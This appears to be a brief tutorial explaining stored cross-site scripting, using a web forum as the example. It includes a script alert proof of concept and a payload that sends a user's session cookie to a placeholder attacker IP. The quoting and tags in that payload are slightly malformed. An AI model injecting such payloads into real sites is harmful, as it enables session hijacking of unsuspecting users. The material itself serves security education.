Cross-Site Scripting is a client-side attack where an attacker attempts to inject malicious JavaScript into a web application so that it is executed in a user’s browser.  A key goal of Cross-Site Scripting is to trigger a user’s browser to run a command that will make a request to a server controlled by an attacker.  This may be used to retrieve session tokens and achieve session hi-jacking or trigger a drive-by download.

Stored Cross-Site Scripting occurs when an attacker is able to submit a malicious payload to the server and it is stored in the website’s database and sent to users when they request certain pages.  As such, POST requests that submit data that is then rendered in a browser may be key areas to investigate.  A common example of this would be a web forum where user messages are stored by the database and sent to any user wanting to view the forum page.  In this way it is “Stored” by the website.

If an attacker can interact with a forum or any other feature that allows multiple users to see their input they HTML may appear as follows:

<h1>user: ngs</h1><p>example message</p>

There are two areas where an attacker may attempt to place malicious code.  The username and message are both controlled by the attacker and displayed to all users.  If an application does not perform any processing to remove malicious payloads the below PoC may be able to trigger an alert box to appear in the user’s browser.

<h1>user: ngs</h1><p><script>alert(1)</script></p>

A more malicious attack may attempt to steal a user’s session cookie, this would allow an attack to impersonate the user and gain access to their account.  This could be achieved with a payload such as:

<h1>user: ngs<h1><p><script>document.write(<img src=“<Attackers IP>?c=‘+document.cookie+ ‘” />’);</script></p>

‍